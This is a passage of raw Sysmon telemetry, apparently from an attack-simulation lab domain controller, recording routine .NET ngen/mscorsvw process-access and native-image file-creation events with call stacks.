+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:33.657{59A5CD1D-9139-6005-2302-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\124c-0\PresentationFramework-SystemCore.dll2021-01-18 13:46:33.657 10341000x80000000000000006286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.610{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2302-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.610{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2302-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:33.610{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2302-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2202-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.532{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2202-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.532{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2202-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:33.438{59A5CD1D-9138-6005-2102-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\614-0\PresentationBuildTasks.dll2021-01-18 13:46:33.438 11241100x80000000000000006322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:34.923{59A5CD1D-913A-6005-2D02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\6dc-0\PresentationFramework.Aero.dll2021-01-18 13:46:34.923 10341000x80000000000000006321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.485{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2D02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:34.470{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2D02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.470{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2D02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:34.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2C02-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.392{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2C02-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:34.392{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2C02-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:34.329{59A5CD1D-913A-6005-2B02-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\121c-0\PresentationFramework-SystemXmlLinq.dll2021-01-18 13:46:34.329 10341000x80000000000000006314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:34.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2B02-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.282{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2B02-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:34.282{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2B02-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.251{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2A02-00000000A301}4700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.235{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2A02-00000000A301}4700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.235{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2A02-00000000A301}4700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:34.188{59A5CD1D-913A-6005-2902-00000000A301}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12c4-0\PresentationFramework-SystemXml.dll2021-01-18 13:46:34.188 10341000x80000000000000006307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2902-00000000A301}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.126{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2902-00000000A301}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:34.126{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2902-00000000A301}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2802-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.063{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2802-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.063{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2802-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\